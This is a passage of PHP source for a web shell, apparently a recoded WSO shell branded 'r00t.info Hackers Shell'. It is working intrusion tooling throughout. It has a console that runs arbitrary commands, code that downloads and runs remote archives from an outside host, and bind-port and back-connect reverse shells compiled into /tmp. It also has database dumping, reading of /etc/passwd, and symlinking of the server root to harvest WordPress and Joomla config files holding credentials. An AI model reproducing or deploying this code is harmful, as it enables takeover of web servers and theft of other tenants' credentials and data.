$link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = 